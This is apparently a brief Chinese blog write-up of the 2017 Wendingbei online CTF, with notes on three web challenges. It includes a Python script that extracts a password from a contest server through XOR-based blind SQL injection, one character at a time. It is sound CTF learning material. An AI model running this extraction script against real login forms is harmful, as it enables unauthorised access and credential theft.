2017问鼎杯线上小记

在家里水了半个暑假,水平下降了不少

Web1

php的浮点数精度问题

Web2

head 发现了 hacked_by_Voldemort以及密码

遂直接登录

admin --> manager中有ajax代码,直接post key=那串数字 就可以了

Web3

注入
比较奇葩的双引号,别的倒是没啥好吐槽常规套路

python

# -*- coding:utf-8 -*-

import requests
import time

url = "http://sec2.hdu.edu.cn/ac5c74b64b4b8352ef2f181affb5ac2a/index.php"



lists = "1234567890abcdefghijklmnopqrstuvwxyz~!@#$%^&*()_+\{\}:<>?"


flag = ""
for j in xrange(1,22):
    for i in lists:
        payload = '1"^(substr(pass,'+str(j)+',1)<>"'+i+'")^"0'
        #print payload
        data = {"username":payload,"password":"123"}
        contents = requests.post(url,data=data)
        #print contents.content
        if "Username error!" in contents.content:
            print str(j)+"   "+i
            flag = flag+i
            break
print flag

网络安全法是要背的,CSAW是要打的~

此处评论已关闭